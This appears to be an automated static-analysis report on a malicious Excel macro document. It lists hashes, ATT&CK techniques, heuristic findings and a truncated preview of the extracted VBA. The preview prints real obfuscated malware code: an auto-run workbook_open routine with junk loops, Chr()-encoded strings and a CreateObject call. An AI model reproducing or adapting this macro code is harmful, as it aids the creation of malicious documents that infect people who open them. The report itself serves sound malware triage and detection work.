Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cc6eeeb9c88c138a…

MALICIOUS

Office (OOXML)

27.1 KB Created: 2018-10-21 23:10:10 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2019-05-16
MD5: d14e152c8acb59eae492307f23cf6d0b SHA-1: eb6d1a76b6dfbb64e806aa4f02e410c372fab2da SHA-256: cc6eeeb9c88c138aee60dd325fef7bef1e91e5a97cdb26ea9a7e988c790c35fd
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The OOXML file contains a Workbook_Open VBA macro, which is a common technique for executing malicious code upon opening the document. The macro uses a Shell() call and CreateObject, indicating it likely attempts to download and execute a second-stage payload. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15332 bytes
SHA-256: 37ccbed5ceb2b3b7a03a5b32a72d3f76ad2275bbed55df3183725a99e1fb6c09
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
T9zDCvx3nflJC47qcI.OL8_kkFgucdRfffzVkbR
While 4 = 4658
Dim LPVt8NWjgL8nyryZNarlCWmzX9jSyFYsPLC8yLFVMe_hdzbxp_j5 As Variant
Wend
Dim zOxleU8nCuYvN As Integer
While 20 = 4907
Dim VlnzkATUWgW_UgeumsedzZ6MUS1GqIsjuNcyHy As Variant
Wend
Dim cijearZfIw As Integer

While 6 = 8466
Dim a3YA4QX6oZdPHKmMwwSEDokwO53S8MvxICoxsqobzfIrTKYW1L4mLCs As Variant
Wend
Dim uPlu8WD7ZmoF_ As Integer
While 23 = 8774
Dim fyd_FzOfe2bDeebuSHkES3fF6qDvirDn_S1Brxf As Variant
Wend
Dim UwKOXHqa2kJ As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "T9zDCvx3nflJC47qcI"
Dim SHgPPWqwFL5A2zBXXAjdUKKuX_aiEXQE7SyO8hfmO55E55_bFtF_U4WG6u2K6Gpr4xDg_vZyc7NYP_zb_8aTPLsB6pRKpTqFMKKE1fbTSPjXo7115XJ7o As String
 Function FdD_ulQVHYvc6vww8JnYBdlNRFmG7NNKIWki(e7Ysq2_mTSPubs8mmzscms_y12RZbq8ESWpUnN3rCqcIKXwD5zU4SjEv7j2xhmJlTIZDBk9W6_Z6Ozlb_MdlUCusP4XDVDIXfzxB7rBRz77SHIeF7Ys)
While 3 = 421
Dim NpKfqKXbHcvtF3HDTj6Z2oZ1KsdNWkB1pax7QASPb2sJGe27buQm As Variant
Wend
Dim Bw_iNTT7pH_fa4C As Integer
While 4 = 8889
Dim n_JuSPn896Oro1gukSXx2UNr7oViRwKsLbL1Q_8UWyEm9k As Variant
Wend
Dim n_HVbLCEIQzb As Integer

 Dim rtmgG7T3y7TA38iwKu1SdgvMf4jS_Pu__T1qda7F139xU99ObNCgW36J7Y_MU_2hKS6hE1Qtxtakh81f4S1uLMlKWps_Zsu1_YlBCZIj6RrlZTk9hcRAHFT8qsIXGLSD9jkGUxccIOx4d9tCDt
While 22 = 3346
Dim xm4DnJsedLnockTBZCOkrTAPZ5T8pFQ4AxJTaRI53bE As Variant
Wend
Dim aYb212_nEBNsbl As Integer
While 8 = 2379
Dim lmszuyW4tnoY_iG2TqOMh18BbEoaK2vDqqyoZDFlrfowLZ1ZfLpfcNCunpV As Variant
Wend
Dim oI6r12jrQtb As Integer


   Dim dkoJsPosTbNRXZf_TSBqjFVtw_zms__Jupox_SaG8WRCWLPvnP3xZAjVN4WnYA_OaCfqtr_A14sLxRUixC8bJKtsERi_5wq6VBkTphA6K16fQVh5gwyUCg_ORvjaH9_DLvyuqA3NBBORNLa
While 27 = 4637
Dim aOileAJIyBMM48JOjbnC_tpabvxw5lrioDuZ6zsAid1TZ5Atpk_Nmp As Variant
Wend
Dim bqiGIrLVMKSngzL As Integer
While 26 = 7629
Dim tSsslbe2UAfuDFRkb69kC1wp_xLOnAvVIf6QPe_L6xLFl7HO5 As Variant
Wend
Dim jzrhNH3eBsxONM As Integer
   
While 24 = 6042
Dim TMIjfIAT75unNmpCBo7TDIDw5WCvMuJ7qj22bVk_3N2vwj4Nx As Variant
Wend
Dim pHR4IIIUoG As Integer
While 12 = 3105
Dim FMEJtx7mtxjoC1ZxQP_Scw7NDAmvZrqEpb8nHqA8mOd9WAEacT22TTnRO1E As Variant
Wend
Dim rIILBEc8i2uoiO As Integer
 Set dkoJsPosTbNRXZf_TSBqjFVtw_zms__Jupox_SaG8WRCWLPvnP3xZAjVN4WnYA_OaCfqtr_A14sLxRUixC8bJKtsERi_5wq6VBkTphA6K16fQVh5gwyUCg_ORvjaH9_DLvyuqA3NBBORNLa = CreateObject(SHgPPWqwFL5A2zBXXAjdUKKuX_aiEXQE7SyO8hfmO55E55_bFtF_U4WG6u2K6Gpr4xDg_vZyc7NYP_zb_8aTPLsB6pRKpTqFMKKE1fbTSPjXo7115XJ7o)
While 19 = 2566
Dim BpLR81C5KR_zyuTxoXQjQwbCa33Beiqo As Variant
Wend
Dim QlRmZ9Q_Cw8 As Integer
While 27 = 8371
Dim zFJOrluKVV97MMHzD7_XljXhLbqVoEPgdxk6OlJYtVTQRnDYPGMCBWU As Variant
Wend
Dim OqlCN5WePEZb As Integer
   UZqDAkRcMHHOFKD3sjceF__kTV8yZPPHsZ2udAz4H1EFaHgtv7JwqZhTZ_snlcB729eoSRXrthVN42HKyMCb_baR2fSXPK = Chr(434 - 336) & Chr(374 - 269) & Chr(440 - 330) & Chr(303 - 257) & Chr(202 - 104) & Chr(492 - 395) & Chr(485 - 370) &
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 44032 bytes
SHA-256: 5930fdb481736eeeda47e5d5fcfd22d6d034504be525ce2e8fe586533de98233
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.